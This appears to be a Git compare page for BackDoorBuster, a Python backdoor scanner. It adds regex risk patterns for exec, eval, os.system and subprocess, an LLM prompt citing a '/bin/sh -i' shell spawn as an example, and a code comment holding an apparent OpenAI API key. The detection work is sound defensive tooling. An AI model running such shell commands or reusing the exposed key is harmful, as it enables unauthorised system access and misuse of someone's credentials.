Compare commits

...

105 Commits

Author SHA1 Message Date
c3ed3e166e Merge pull request 'tests/final-tests 完成最终代码' (#34) from tests/final-tests into main
Reviewed-on: #34
Reviewed-by: dqy <dqy@noreply.localhost>
2024-06-09 13:09:49 +08:00
f6fa95ba16 Merge branch 'tests/final-tests' of https://git.mamahaha.work/sangge/BackDoorBuster into tests/final-tests 2024-06-09 12:28:51 +08:00
94407e71b8 test:添加测试用例 2024-06-09 12:26:38 +08:00
dqy
2adb1cbc2e fix: 删除head 2024-06-06 17:14:47 +08:00
dqy
430d2b8f8a Merge branch 'fix/requirements-detection' into tests/final-tests 2024-06-06 16:21:03 +08:00
dqy
752e774714 fix: 修改正则匹配逻辑 2024-06-06 16:05:25 +08:00
dqy
373defc5bb feat: 将依赖检测添加到模组 2024-06-05 15:56:06 +08:00
dqy
c811e434c6 fix: 依赖报告输出格式修改 2024-06-05 10:46:42 +08:00
167bbe0a14 fix:修复文心一言的调用 2024-06-05 10:36:26 +08:00
e9b1e82492 feat:为llm常规添加并发,提高效率 2024-06-04 21:47:17 +08:00
a2651b499e chore: TODO preprocessing 2024-06-04 21:44:42 +08:00
a5f7665799 Merge branch 'tests/final-tests' of https://git.mamahaha.work/sangge/BackDoorBuster into tests/final-tests 2024-06-04 21:10:13 +08:00
caeee4d179 fix:修复pickle结果输出 2024-06-04 21:09:43 +08:00
dqy
7198c8b4da Merge branch 'tests/final-tests' of https://git.mamahaha.work/sangge/BackDoorBuster into tests/final-tests 2024-06-04 20:58:35 +08:00
dqy
843c9d7ba3 feat: 修改依赖检测功能 2024-06-04 20:58:31 +08:00
dqy
cb30fddb1c feat: 修改pycdc默认路径 2024-06-04 20:58:14 +08:00
81cbc88e9b feat: update accurency formula 2024-06-04 20:31:09 +08:00
fc4e0e3b30 Merge branch 'tests/final-tests' of https://git.mamahaha.work/sangge/BackDoorBuster into tests/final-tests 2024-06-04 19:50:34 +08:00
ec30999d2c fix:修改pickle扫描方法 与其他统一 2024-06-04 19:50:31 +08:00
0f2fb3c925 feat:添加pickle扫描入口 2024-06-04 19:35:42 +08:00
fd4ecce710 fix: fix some error 2024-06-04 19:27:56 +08:00
610e35f868 Merge branch 'tests/final-tests' of https://git.mamahaha.work/sangge/BackDoorBuster into tests/final-tests 2024-06-04 18:12:08 +08:00
6e1c0e5ae6 feat: update test case 2024-06-04 18:11:14 +08:00
dqy
977841837d feat: 默认从系统变量pycdc中读取路径 2024-06-04 17:47:25 +08:00
42135c516c feat:添加GPT并发 2024-06-04 17:25:37 +08:00
72901463c6 fix:增加llm结果鲁棒性 2024-06-04 17:13:30 +08:00
65820966df Merge pull request 'fix: 修复Uncomply反编译报错' (#31) from fix/pyc-detection into tests/final-tests
Reviewed-on: #31
2024-06-04 16:43:17 +08:00
b3435c00c3 Merge branch 'tests/final-tests' into fix/pyc-detection 2024-06-04 16:43:05 +08:00
dqy
cd779ef43f fix: 修复Uncomply反编译报错 2024-06-04 16:14:34 +08:00
fbeba5b4fc feat: update test cases 2024-06-04 15:05:18 +08:00
3f6375977c fix: fix pickle and pyc inject code 2024-06-04 14:14:01 +08:00
5aafb1c24f Merge branch 'main' into tests/final-tests 2024-06-04 13:37:00 +08:00
5d41503b39 fix: clean code 2024-06-04 13:36:31 +08:00
5a228e5cb0 feat: update return content 2024-06-04 11:34:43 +08:00
4f5c67b32e fix: fix some error 2024-06-03 21:17:42 +08:00
4a55822a8f chore: update gitignore 2024-06-03 20:50:34 +08:00
4e67f4ebed feat:对正则匹配出的文件再过一次llm检测 2024-06-03 20:34:30 +08:00
6f51f86d6a Merge pull request 'feature/pickle-data' (#20) from feature/pickle-data into main
Reviewed-on: #20
Reviewed-by: sangge <sangge@noreply.localhost>
Reviewed-by: ccyj <ccyj@noreply.localhost>
2024-06-03 20:31:33 +08:00
f113449fc4 Merge branch 'main' into feature/pickle-data 2024-06-03 20:31:12 +08:00
4f4860342c Merge pull request 'feature/pyc-detection' (#26) from feature/pyc-detection into main
Reviewed-on: #26
Reviewed-by: sangge <sangge@noreply.localhost>
Reviewed-by: ccyj <ccyj@noreply.localhost>
2024-06-03 20:25:08 +08:00
49408eda9f Merge pull request 'feature/rglob' (#29) from feature/rglob into main
Reviewed-on: #29
Reviewed-by: sangge <sangge@noreply.localhost>
Reviewed-by: ccyj <ccyj@noreply.localhost>
2024-06-03 20:24:42 +08:00
e653ddd726 feat: 正则匹配检测测试 2024-06-03 16:38:01 +08:00
dqy
ca69536e41 fix: 添加动画依赖 2024-06-03 16:31:19 +08:00
dqy
d1ac4594e4 feat: 使用rglob扫描 2024-06-03 16:29:35 +08:00
1a71a72ddf feat: (UNFINISH) 正则匹配检测测试 2024-06-03 13:44:03 +08:00
da9b2b52ac feat: (UNFINISH) add framework to inject backdoor 2024-06-03 11:54:33 +08:00
dqy
62b77812af fix: 去除扫描单个文件进度条 2024-06-03 11:41:19 +08:00
dqy
7eb4de8e6c style: 添加扫描动画 2024-06-02 20:24:03 +08:00
dqy
b99334ed12 fix: 解决unicode字符报错 2024-06-02 19:54:47 +08:00
dqy
17245a9bcf fix: 解决unicode编码错误 2024-05-31 21:13:01 +08:00
dqy
b673575fe4 fix: 删除无效模块 2024-05-31 20:36:42 +08:00
dqy
df65fff2c7 feat: 添加对python 3.11的反编译模块 2024-05-31 20:33:47 +08:00
dqy
aeb4a33d98 Merge branch 'main' of https://git.mamahaha.work/sangge/BackDoorBuster into feature/pyc-detection 2024-05-31 19:20:35 +08:00
89b37ddfd6 Merge pull request 'feat: 美化输出' (#27) from feature/output-enhancement into main
Reviewed-on: #27
Reviewed-by: sangge <sangge@noreply.localhost>
Reviewed-by: ccyj <ccyj@noreply.localhost>
2024-05-30 22:47:33 +08:00
dqy
f798cf143c fix: 删除原有代码注释 2024-05-30 22:27:04 +08:00
dqy
95feda67d9 feat: 美化输出
Some checks failed
Python application test / build (pull_request) Failing after 2m11s
2024-05-30 22:15:49 +08:00
5ed90e39f8 Merge pull request 'feature/package-development' (#22) from feature/package-development into main
Some checks failed
Python application test / build (push) Failing after 1m0s
Reviewed-on: #22
Reviewed-by: sangge <sangge@noreply.localhost>
Reviewed-by: ccyj <ccyj@noreply.localhost>
2024-05-30 16:26:58 +08:00
dqy
e80e83ad51 Merge branch 'main' of https://git.mamahaha.work/sangge/BackDoorBuster into feature/pyc-detection
Some checks failed
Python application test / build (pull_request) Failing after 52s
2024-05-30 16:13:40 +08:00
dqy
7cc81141c6 docs: 删除安装依赖 2024-05-30 15:59:26 +08:00
dqy
2a94f27edc docs: 修改README 2024-05-30 15:48:06 +08:00
dqy
0cd826c2fd docs: 修改README 2024-05-30 08:12:30 +08:00
dqy
d56d0173ad docs: 完善文档 2024-05-29 21:57:32 +08:00
dqy
0c4f560b7a Merge branch 'feature/package-development' of https://git.mamahaha.work/sangge/BackDoorBuster into feature/package-development 2024-05-29 21:29:12 +08:00
dqy
41b16c53bc fix: 修改检测模块引入 2024-05-29 21:24:08 +08:00
dqy
99b481059b style: 修改检测模块文件名 2024-05-29 21:23:26 +08:00
dqy
d2b0fb286c docs: 修改用法文档 2024-05-29 21:21:56 +08:00
dqy
8a14ef4341 fix: 修改相对模块引入 2024-05-29 20:36:09 +08:00
dqy
e418bbf380 test: 添加反汇编之后的正则匹配测试 2024-05-29 20:32:24 +08:00
dqy
d30ea0ca61 feat: 添加反汇编模块依赖 2024-05-29 20:31:42 +08:00
5552a7e448 Merge branch 'feature/package-development' of https://git.mamahaha.work/sangge/BackDoorBuster into feature/package-development 2024-05-29 20:25:27 +08:00
99457f1ceb fix: fix setup require 2024-05-29 20:24:44 +08:00
dqy
2b90268628 Merge branch 'feature/package-development' of https://git.mamahaha.work/sangge/BackDoorBuster into feature/package-development 2024-05-29 20:24:35 +08:00
dqy
dd4ab45cbf fix: 修复依赖报错 2024-05-29 20:24:12 +08:00
dqy
3f8b2a7987 feat: 添加反汇编依赖 2024-05-29 20:23:48 +08:00
dqy
40f5c07fa1 feat: 添加对pyc文件的反汇编功能模块 2024-05-29 20:08:40 +08:00
b73170cd2d Merge branch 'main' into feature/package-development 2024-05-29 20:05:05 +08:00
b518fef6d2 test: add pickle unittest 2024-05-27 20:36:18 +08:00
accd50e8ce fix: fix some error 2024-05-27 20:35:13 +08:00
fab5e680ef style: format code 2024-05-27 17:08:12 +08:00
dqy
6967a154f7 perf: 修改安装包命名 2024-05-26 17:04:27 +08:00
dqy
c97780cde3 Merge pull request 'feature/cn-gpt' (#21) from feature/cn-gpt into main
Reviewed-on: #21
Reviewed-by: sangge <sangge@noreply.localhost>
Reviewed-by: dqy <dqy@noreply.localhost>
2024-05-26 16:59:22 +08:00
b544007e6b fix:删除无用测试代码——api_key 2024-05-24 20:44:35 +08:00
b1bc566c09 update:修改国内gpt调用 2024-05-24 20:27:18 +08:00
f0e2251dc0 Merge branch 'feature/cn-gpt' of https://git.mamahaha.work/sangge/BackDoorBuster into feature/cn-gpt 2024-05-24 17:29:10 +08:00
faf68760c9 fix:typeerror,修改类型错误 2024-05-24 17:28:34 +08:00
dqy
44c6086b8c Merge branch 'main' into feature/cn-gpt
Some checks failed
Python application test / build (pull_request) Failing after 14m6s
2024-05-18 20:58:38 +08:00
dqy
27ec14be54 Merge pull request 'doc/add_banner' (#18) from doc/add_banner into main
Some checks failed
Python application test / build (push) Failing after 14m12s
Reviewed-on: #18
Reviewed-by: ccyj <ccyj@noreply.localhost>
Reviewed-by: dqy <dqy@noreply.localhost>
2024-05-18 20:54:42 +08:00
dqy
21d1a6f3cc Merge branch 'main' into doc/add_banner
Some checks failed
Python application test / build (pull_request) Failing after 14m46s
2024-05-18 20:54:00 +08:00
8fed7af432 Merge branch 'main' into feature/cn-gpt
Some checks failed
Python application test / build (pull_request) Failing after 12m46s
2024-05-17 16:06:00 +08:00
9a7c38f1a8 fix:休整代码
Some checks failed
Python application test / build (pull_request) Failing after 12m12s
2024-05-16 21:20:12 +08:00
dd45c467a3 feature/国内GPT-文心一言 2024-05-16 21:15:22 +08:00
79a605a6b4 style: format code style
Some checks are pending
Python application test / build (pull_request) Waiting to run
2024-05-15 19:10:35 +08:00
9d6f054478 fix:补充了测试代码 2024-05-15 13:38:01 +08:00
dqy
569497f79e docs: 撰写deb文档
Some checks failed
Python application test / build (pull_request) Failing after 12m32s
2024-05-15 11:14:31 +08:00
dqy
958dee355e docs: 撰写pip文档 2024-05-15 10:45:34 +08:00
dqy
8d445b11a4 docs: 撰写pip文档 2024-05-15 10:40:36 +08:00
dqy
ed3b9e7e4c feat: 支持pip包 2024-05-15 10:32:53 +08:00
97fbf649a8 del:删除测试文件
Some checks failed
Python application test / build (pull_request) Failing after 12m9s
2024-05-14 21:37:16 +08:00
db3244f55a fix:逻辑小错误 2024-05-14 21:34:54 +08:00
d073cfad31 del:删除无用库 2024-05-14 21:33:08 +08:00
0ae787002c update:完善调用方式,删除多余代码 2024-05-14 21:31:31 +08:00
fa86f12a48 feat:添加了pickle数据扫描类 2024-05-14 21:02:45 +08:00
2e5460a522 feature/GPT:文心一言api,国内gpt(百度大模型) 2024-05-14 20:24:01 +08:00
3e0dd66d31 doc: add project's banner
Some checks are pending
Python application test / build (pull_request) Waiting to run
2024-05-14 17:50:16 +08:00
24206b13af feat: add git lfs 2024-05-14 17:49:28 +08:00
24 changed files with 1827 additions and 294 deletions

1
.gitattributes vendored Normal file
View File

@@ -0,0 +1 @@
*.webp filter=lfs diff=lfs merge=lfs -text

2
.gitignore vendored
View File

@@ -159,4 +159,4 @@ cython_debug/
# and can be added to the global gitignore or merged into this file. For a more nuclear
# option (not recommended) you can uncomment the following to ignore the entire idea folder.
.idea/
tmp/

2
MANIFEST.in Normal file
View File

@@ -0,0 +1,2 @@
include README.md
include LICENSE

View File

@@ -1,5 +1,7 @@
# BackDoorBuster
![BackDoorBuster Banner](./banner.webp)
## 项目背景
随着网络安全威胁的增加,恶意软件和后门的检测成为了保护个人和组织数据安全的重要任务。后门通常被隐藏在合法软件中,给黑客提供远程控制目标系统的能力。本项目旨在开发一个工具,能够有效识别和评估潜在的后门风险。
@@ -16,21 +18,66 @@
- **报告生成**: 自动生成详细的检测报告,列出所有发现的敏感操作和对应的风险等级。
- **持续更新与维护**: 随着新的后门技术和检测方法的出现,持续更新正则表达式库和评级标准。
## 打包
### pip
#### 打包命令
```bash
pip install wheel
python setup.py sdist bdist_wheel
```
执行上述命令后,会在 dist 目录下生成 .tar.gz 和 .whl 文件。
#### 本地安装
- 安装 .whl 文件:
``` bash
pip install dist/backdoor_buster-0.1.0-py3-none-any.whl
```
- 安装 .tar.gz 文件:
``` bash
pip install dist/backdoor_buster-0.1.0.tar.gz
```
#### 上传到 PyPI
- 安装 twine
``` bash
pip install twine
```
- 使用 twine 上传包到 PyPI
``` bash
twine upload dist/*
```
需要提供 PyPI 的用户名和密码。如果没有 PyPI 账号,可以在 PyPI 注册。
#### 使用 PyPI 安装
包上传到 PyPI 后,可以通过以下命令安装:
``` bash
pip install backdoor_buster
```
## 使用说明
1. 安装依赖:
```bash
pip install -r requirements.txt
```
2. 执行扫描:
1. 执行扫描:
```bash
python scan.py <project_directory>
python -m detection <project_directory> -o <path> -m <mode>
```
3. 查看报告:
2. 查看报告:
报告将以文本形式输出在控制台,并可选择输出到指定文件。

BIN
banner.webp (Stored with Git LFS) Normal file

Binary file not shown.

View File

@@ -1,8 +1,11 @@
import json
import os
import threading
import time
from .utils import *
import openai
import signal
# import signal
class TimeoutException(Exception):
@@ -22,10 +25,10 @@ def detectGPT(content: str):
raise ValueError("env OPENAI_API_KEY no set")
# Set alarm timer
signal.signal(signal.SIGTERM, timeout_handler)
signal.alarm(10)
# signal.signal(signal.SIGTERM, timeout_handler)
# signal.alarm(10)
client = openai.OpenAI(api_key=api_key)
client = openai.OpenAI(base_url="https://api.kpi7.cn/v1", api_key=api_key)
text = content
# client = openai.OpenAI(api_key="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") #测试用key
response = client.chat.completions.create(
@@ -33,15 +36,17 @@ def detectGPT(content: str):
{
"role": "system",
"content": "You are a Python code reviewer.Read the code below and identify any potential security vulnerabilities. Classify them by risk level (high, medium, low, none). Only report the line number and the risk level.\nYou should output the result as json format in one line. For example: "
'[{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnable}"}] Each of these three field is required.\n'
"You are required to only output the json format. Do not output any other information.\n",
'[{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnable}"}] Each of these three field is required.\n'
"You are required to only output the json format. Do not output any other information.请注意:只对有具体危害的代码片段判定为有风险。\n"
"For examples:\nos.system('ls'),subprocess.call(['ls', '-l']),subprocess.call([\"/bin/sh\",\"-i\"]),eval(code),exec(code) and so on.\n"
"Please IGNORE the risks that dont matter a lot.",
},
{
"role": "user",
"content": text,
},
],
model="gpt-3.5-turbo",
model="gpt-4o",
)
try:
message_content = response.choices[0].message.content
@@ -55,12 +60,46 @@ def detectGPT(content: str):
except TimeoutException:
raise TimeoutException("The api call timed out")
finally:
signal.alarm(0)
# finally:
# signal.alarm(0)
classified_results = {"high": [], "medium": [], "low": [], "none": []}
for res in res_json:
classified_results[res["Risk"]].append(
(res["Line"], text.split("\n")[res["Line"] - 1].strip())
)
try:
classified_results[res["Risk"]].append(
(res["Line"], text.split("\n")[res["Line"] - 1].strip())
)
except IndexError:
pass
return classified_results
def GPTdetectFileList(fileList):
# print(len(fileList))
results = {"high": [], "medium": [], "low": [], "none": []}
threads = []
for file in fileList:
content = read_file_content(str(file))
threads.append(threading.Thread(target=GPTThread, args=(str(file), content, results)))
for thread in threads:
thread.start()
time.sleep(0.1)
for thread in threads:
thread.join()
return results
def GPTThread(filename, content, results):
try:
res = detectGPT(content)
# print(res)
for key in res:
if key != "none": # Exclude 'none' risk level
results[key].extend(
[
(f"{filename}: Line {line_num}", line)
for line_num, line in res[key]
]
)
except Exception as e:
print(e)

View File

@@ -12,7 +12,7 @@ def find_dangerous_functions(
r"\bexec\(": "high",
r"\bpopen\(": "medium",
r"\beval\(": "high",
r"\bsubprocess\.run\(": "medium",
r"\bsubprocess": "medium",
r"\b__getattribute__\(": "high",
r"\bgetattr\(": "medium",
r"\b__import__\(": "high",
@@ -25,15 +25,28 @@ def find_dangerous_functions(
".cpp": {
r"\bsystem\(": "high",
},
".pyc": {
r"\bexec\b": "high",
r"\beval\b": "high",
r"\bos\.system\b": "high",
r"\bos\.exec\b": "high",
r"\bos\.fork\b": "high",
r"\bos\.kill\b": "high",
r"\bos\.popen\b": "medium",
r"\bos\.spawn\b": "medium",
r"\bsubprocess": "medium",
},
}
risk_patterns = patterns.get(file_extension, {})
classified_results = {"high": [], "medium": [], "low": [], "none": []}
for line_number, line in enumerate(file_content.split("\n"), start=1):
clean_line = remove_comments(line, file_extension)
if not clean_line:
continue
for pattern, risk_level in risk_patterns.items():
if re.search(pattern, clean_line):
classified_results[risk_level].append((line_number, clean_line))
if file_content is not None:
for line_number, line in enumerate(file_content.split("\n"), start=1):
clean_line = remove_comments(line, file_extension)
if not clean_line:
continue
# 消除换行符,避免影响正则匹配
clean_line = clean_line.replace("\\n", "")
for pattern, risk_level in risk_patterns.items():
if re.search(pattern, clean_line, re.MULTILINE | re.DOTALL):
classified_results[risk_level].append((line_number, clean_line))
return classified_results

502
detection/__main__.py Normal file
View File

@@ -0,0 +1,502 @@
import json
import os
from typing import Dict, List, Tuple, Optional
from reportlab.lib.pagesizes import letter
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate
from detection.pickle_detection import pickleDataDetection
from .requirements_detection import requirement_detection
from .Regexdetection import find_dangerous_functions
from .GPTdetection import detectGPT, GPTdetectFileList
# from .cngptdetection import detectGPT,GPTdetectFileList
from .pyc_detection import disassemble_pyc
from .utils import *
import sys
from colorama import init, Fore, Style
from tqdm import tqdm
from pathlib import Path
PYCDC_FLAG = True
PYCDC_ADDR_FLAG = True
SUPPORTED_EXTENSIONS = {".py", ".js", ".cpp", ".pyc",".pkl",".pickle"}
OUTPUT_FORMATS = ["html", "md", "txt", "pdf"]
ORDERS = [
"__import__",
"system",
"exec",
"popen",
"eval",
"subprocess",
"__getattribute__",
"getattr",
"child_process",
"kill",
"fork",
]
# Initialize colorama
init(autoreset=True)
ORANGE = "\033[38;5;214m"
CYAN = Fore.CYAN
def supports_color() -> bool:
"""
Checks if the running terminal supports color output.
Returns:
bool: True if the terminal supports color, False otherwise.
"""
# Windows support
if sys.platform == "win32":
return True
# Check if output is a TTY (terminal)
if hasattr(sys.stdout, "isatty") and sys.stdout.isatty():
return True
return False
def supports_emoji() -> bool:
"""
Checks if the running terminal supports emoji output.
Returns:
bool: True if the terminal supports emoji, False otherwise.
"""
# This is a simple check. Modern terminals typically support emoji.
return sys.platform != "win32" or os.getenv("WT_SESSION") is not None
def highlight_orders(line: str, risk_level: str, use_color: bool) -> str:
"""
Highlights specific orders in the line based on risk level.
Args:
line (str): The line to highlight.
risk_level (str): The risk level of the line ("high", "medium", "low").
use_color (bool): Whether to use color for highlighting.
Returns:
str: The highlighted line.
"""
risk_colors = {
"high": Fore.RED,
"medium": Fore.YELLOW,
"low": CYAN,
}
color = risk_colors.get(risk_level, Fore.WHITE) if use_color else ""
reset = Style.RESET_ALL if use_color else ""
for order in ORDERS:
line = line.replace(order, f"{color}{order}{reset}")
return line
def generate_text_content(results: Dict[str, List[Tuple[int, str]]]) -> str:
"""
Generates a formatted text report for security analysis results.
Args:
results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
Returns:
str: The formatted text report as a string.
"""
use_color = supports_color()
use_emoji = supports_emoji()
text_output = "Security Analysis Report\n"
text_output += "=" * 30 + "\n\n"
# text_output+= "chatGPT检测结果\n\n"
for risk_level, entries in results.items():
# print(risk_level, entries)
if risk_level == "pickles":
text_output += f"Pickles:\n"
for i in entries:
text_output += f" {i['file']}:{json.dumps(i['result'])}\n"
elif entries and risk_level != "none":
risk_color = (
{
"high": Fore.RED,
"medium": Fore.YELLOW,
"low": Fore.GREEN,
}.get(risk_level, Fore.WHITE)
if use_color
else ""
)
risk_title = (
{
"High": "👹",
"Medium": "👾",
"Low": "👻",
}
if use_emoji
else {
"High": "",
"Medium": "",
"Low": "",
}
)
text_output += f"{risk_color}{risk_level.capitalize()} Risk{risk_title[risk_level.capitalize()]}:{Style.RESET_ALL if use_color else ''}\n"
text_output += "-" * (len(risk_level) + 6) + "\n"
for line_num, line in entries:
line = highlight_orders(line, risk_level, use_color)
line_text = f"{Style.RESET_ALL if use_color else ''} {Fore.GREEN if use_color else ''}{line_num}{Style.RESET_ALL if use_color else ''}: {line}{Style.RESET_ALL if use_color else ''}\n"
text_output += line_text
text_output += "\n"
return text_output
def output_results(
results: Dict[str, List[Tuple[int, str]]],
output_format: str,
output_file: Optional[str] = None,
) -> None:
"""
Outputs the security analysis results in the specified format.
Args:
results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
output_format (str): The format to output the results in. Supported formats: "pdf", "html", "md", "txt".
output_file (Optional[str]): The name of the file to save the output. If None, prints to the terminal.
"""
OUTPUT_FORMATS = {"pdf", "html", "md", "txt"}
if output_file:
file_name, file_ext = os.path.splitext(output_file)
if output_format not in OUTPUT_FORMATS:
output_format = "txt"
output_file = f"{file_name}.txt"
results_dir = os.path.dirname(output_file)
if not os.path.exists(results_dir) and results_dir != "":
os.makedirs(results_dir)
if output_format == "pdf":
output_pdf(results, output_file)
elif output_format == "html":
output_html(results, output_file)
elif output_format == "md":
output_markdown(results, output_file)
else: # Default to txt
output_text(results, output_file)
else:
# If no output file is specified, default to text output to the terminal.
txt_output = generate_text_content(results)
print(txt_output)
def output_pdf(results: Dict[str, List[Tuple[int, str]]], file_name):
doc = SimpleDocTemplate(file_name, pagesize=letter)
story = []
styles = getSampleStyleSheet()
# Add the title centered
title_style = styles["Title"]
title_style.alignment = 1 # Center alignment
title = Paragraph("Security Analysis Report", title_style)
story.append(title)
story.append(Spacer(1, 20)) # Space after title
# Add risk levels and entries
normal_style = styles["BodyText"]
for risk_level, entries in results.items():
if risk_level != "none":
story.append(
Paragraph(f"{risk_level.capitalize()} Risk:", styles["Heading2"])
)
for line_num, line in entries:
entry = Paragraph(f"Line {line_num}: {line}", normal_style)
story.append(entry)
story.append(Spacer(1, 12)) # Space between sections
doc.build(story)
def output_html(results: Dict[str, List[Tuple[int, str]]], file_name=None):
"""
Generates an HTML report for security analysis results.
Args:
results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
file_name (Optional[str]): The name of the file to save the HTML output. If None, returns the HTML string.
Returns:
Optional[str]: The HTML string if file_name is None, otherwise None.
"""
html_output = """
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="icon" href="https://s2.loli.net/2024/05/30/WDc6MekjbuCU9Qo.png">
<title>Security Analysis Report</title>
<style>
body {
background-image: url('https://s2.loli.net/2024/05/30/85Mv7leB2IRWNp6.jpg');
background-size: 100%, auto;
background-attachment: fixed;
font-family: Arial, sans-serif;
}
h1, h2 {
color: white;
}
ul {
list-style-type: none;
padding: 0;
}
li {
background: rgba(255, 255, 255, 0.8);
margin: 5px 0;
padding: 10px;
border-radius: 5px;
}
</style>
</head>
<body>
<h1>Security Analysis Report</h1>
"""
for risk_level, entries in results.items():
if risk_level != "none":
risk_title = {
"High": f"<h2>{risk_level.capitalize()} Risk👹</h2><ul>",
"Medium": f"<h2>{risk_level.capitalize()} Risk👾</h2><ul>",
"Low": f"<h2>{risk_level.capitalize()} Risk👻</h2><ul>",
}
html_output += risk_title[risk_level.capitalize()]
for line_num, line in entries:
html_output += f"<li>{line_num}: {line}</li>"
html_output += "</ul>"
html_output += "</body></html>"
if file_name:
with open(file_name, "w", encoding="utf-8") as file:
file.write(html_output)
return None
else:
return html_output
def output_markdown(results: Dict[str, List[Tuple[int, str]]], file_name=None):
"""
Generates a Markdown report for security analysis results.
Args:
results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
file_name (Optional[str]): The name of the file to save the Markdown output. If None, returns the Markdown string.
Returns:
Optional[str]: The Markdown string if file_name is None, otherwise None.
"""
md_output = "# Security Analysis Report\n\n"
for risk_level, entries in results.items():
if risk_level != "none":
md_output += f"## {risk_level.capitalize()} Risk\n\n"
md_output += "| Line Number | Description |\n"
md_output += "|-------------|-------------|\n"
for line_num, line in entries:
md_output += f"| {line_num} | {line} |\n"
md_output += "\n"
if file_name:
with open(file_name, "w") as file:
file.write(md_output)
return None
else:
return md_output
def output_text(results: Dict[str, List[Tuple[int, str]]], file_name=None):
"""
Generates a plain text report for security analysis results.
Args:
results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
file_name (Optional[str]): The name of the file to save the text output. If None, returns the text string.
Returns:
Optional[str]: The text string if file_name is None, otherwise None.
"""
text_output = "Security Analysis Report\n"
text_output += "=" * len("Security Analysis Report") + "\n\n"
for risk_level, entries in results.items():
if risk_level != "none":
text_output += f"{risk_level.capitalize()} Risk:\n"
text_output += "-" * len(f"{risk_level.capitalize()} Risk:") + "\n"
for line_num, line in entries:
text_output += f" Line {line_num}: {line}\n"
text_output += "\n"
if file_name:
with open(file_name, "w") as file:
file.write(text_output)
return None
else:
return text_output
def checkModeAndDetect(mode: str, filePath: str, fileExtension: str, pycdc_addr: str):
# TODO:添加更多方式,这里提高代码的复用性和扩展性
if fileExtension == ".pyc":
# 反汇编pyc文件
file_content = disassemble_pyc(filePath, pycdc_addr)
if file_content == "none":
global PYCDC_FLAG
PYCDC_FLAG = False
return ""
elif file_content == "invalid":
global PYCDC_ADDR_FLAG
PYCDC_ADDR_FLAG = False
if mode == "regex":
return find_dangerous_functions(file_content, fileExtension)
elif mode == "llm":
return detectGPT(file_content)
else:
return find_dangerous_functions(file_content, fileExtension)
else:
file_content = read_file_content(filePath)
if mode == "regex":
return find_dangerous_functions(file_content, fileExtension)
elif mode == "llm":
return detectGPT(file_content)
else:
return find_dangerous_functions(file_content, fileExtension)
def process_path(
path: str,
output_format: str,
mode: str,
pycdc_addr: str,
output_file=None,
requirement_path=None,
):
results = {"high": [], "medium": [], "low": [], "none": [], "pickles": []}
if os.path.isdir(path):
# 使用rglob获取所有文件
all_files = [
file_path
for file_path in Path(path).rglob("*")
if file_path.suffix in SUPPORTED_EXTENSIONS
]
print(all_files)
if mode == "llm":
results = GPTdetectFileList(all_files)
else:
# 扫描动画
for file_path in tqdm(all_files, desc="Scanning files", unit="file"):
file_extension = file_path.suffix
# print(file_extension)
if file_extension in [".pkl",".pickle"]:
# print("识别到pickle")
res = pickleDataDetection(str(file_path), output_file)
results["pickles"].append({"file": str(file_path), "result": res})
continue
file_results = checkModeAndDetect(
mode, str(file_path), file_extension, pycdc_addr
)
if file_results is not None:
for key in file_results:
if key != "none": # Exclude 'none' risk level
results[key].extend(
[
(f"{file_path}: Line {line_num}", line)
for line_num, line in file_results[key]
]
)
elif os.path.isfile(path):
file_extension = os.path.splitext(path)[1]
if file_extension in [".pkl", ".pickle"]:
res = pickleDataDetection(str(path), output_file)
results["pickles"].append({"file": str(path), "result": res})
elif file_extension in SUPPORTED_EXTENSIONS:
file_results = checkModeAndDetect(mode, path, file_extension, pycdc_addr)
if file_results is not None:
for key in file_results:
if key != "none": # Exclude 'none' risk level
results[key].extend(
[
(f"{path}: Line {line_num}", line)
for line_num, line in file_results[key]
]
)
else:
print("Unsupported file type.")
return
else:
print("Invalid path.")
sys.exit(1)
if requirement_path is not None:
requirement_detection(requirement_path, output_file)
output_results(results, output_format, output_file)
def main():
import argparse
parser = argparse.ArgumentParser(
description="Backdoor detection tool.", prog="detection"
)
parser.add_argument("path", help="Path to the code to analyze")
parser.add_argument("-o", "--output", help="Output file path", default=None)
parser.add_argument(
"-m", "--mode", help="Mode of operation:[regex,llm]", default="regex"
)
parser.add_argument(
"-p",
"--pycdc",
help="Path to pycdc.exe to decompile",
default=os.getenv("PATH"),
)
parser.add_argument(
"-P",
"--Pickle",
help="Path to pickle file to analyze",
default=None,
)
parser.add_argument(
"-r",
"--requirement",
help="Path to requirement file to analyze",
default=None,
)
args = parser.parse_args()
output_format = "txt" # Default output format
output_file = None
if args.output:
_, ext = os.path.splitext(args.output)
ext = ext.lower()
if ext in [".html", ".md", ".txt", ".pdf"]:
output_format = ext.replace(".", "")
output_file = args.output
else:
print(
"Your input file format was incorrect, the output has been saved as a TXT file."
)
output_file = args.output.rsplit(".", 1)[0] + ".txt"
# 如果未指定输出文件,则输出到 stdout否则写入文件
process_path(
args.path, output_format, args.mode, args.pycdc, output_file, args.requirement
)
if PYCDC_FLAG == False:
print(
"ERROR: Detected Python 3.11 or above .pyc files. You need to install pycdc and compile it yourself to obtain pycdc."
)
print("Repo: https://github.com/zrax/pycdc.git")
if PYCDC_ADDR_FLAG == False:
print("ERROR: The specified pycdc.exe path is not valid")
print("Please check your pycdc path.")
if __name__ == "__main__":
main()

View File

@@ -3,6 +3,8 @@ from typing import Dict, List, Tuple
from reportlab.lib.pagesizes import letter
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate
from detection.pickle_detection import pickleDataDetection
from .Regexdetection import find_dangerous_functions
from .GPTdetection import detectGPT
from .utils import *
@@ -176,6 +178,7 @@ def main():
parser.add_argument(
"-m", "--mode", help="Mode of operation:[regex,llm]", default="regex"
)
parser.add_argument("-p", "--pickle", help="analyze the pickle file", default=None)
args = parser.parse_args()
output_format = "txt" # Default output format
output_file = None
@@ -191,7 +194,10 @@ def main():
)
output_file = args.output.rsplit(".", 1)[0] + ".txt"
# 如果未指定输出文件,则输出到 stdout否则写入文件
